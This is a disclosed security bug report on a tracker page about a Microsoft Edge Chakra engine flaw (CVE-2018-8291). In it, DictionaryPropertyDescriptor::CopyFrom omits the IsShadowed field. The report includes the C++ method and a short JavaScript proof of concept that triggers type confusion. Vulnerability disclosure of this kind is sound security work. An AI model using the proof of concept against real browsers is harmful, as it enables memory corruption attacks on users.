New issue
Advanced search Search tips

Issue 1576 link

Starred by 2 users

Issue metadata

Status: Fixed
Closed: Aug 14

Sign in to add a comment

Microsoft Edge: Chakra: DictionaryPropertyDescriptor::CopyFrom doesn't copy all fields

Project Member Reported by, May 17

Issue description

Here's the method.
    template <typename TPropertyIndex>
    template <typename TPropertyIndexFrom>
    void DictionaryPropertyDescriptor<TPropertyIndex>::CopyFrom(DictionaryPropertyDescriptor<TPropertyIndexFrom>& descriptor)
        this->Attributes = descriptor.Attributes;
        this->Data = (descriptor.Data == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Data;
        this->Getter = (descriptor.Getter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Getter;
        this->Setter = (descriptor.Setter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Setter;
        this->IsAccessor = descriptor.IsAccessor;

        this->IsInitialized = descriptor.IsInitialized;
        this->IsFixed = descriptor.IsFixed;
        this->UsedAsFixed = descriptor.UsedAsFixed;

Given its name, I think that the method is supposed to copy all the fields from another descriptor to "this". But it actually leaves some fields uncopied. The "IsShadowed" field is one of them which indicates that a Let or Const variable has been declared in the global object with the same name as the name of a property of the global object. This lack of copying the "IsShadowed" field can lead to type confusion like in the PoC or uninitialized pointer dereference.

let x = 1;

this.x = 0x1234;  // IsShadowed

// Convert to BigDictionaryTypeHandler, CopyFrom will be used in the process.
for (let i = 0; i < 0x10000; i++) {
    this['a' + i] = 1;

// Set IsAccessor
this.__defineSetter__('x', () => {});

// Type confusion

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Project Member

Comment 1 by, Aug 14

Labels: CVE-2018-8291
Status: Fixed (was: New)
Project Member

Comment 2 by, Aug 17

Labels: -Restrict-View-Commit

Sign in to add a comment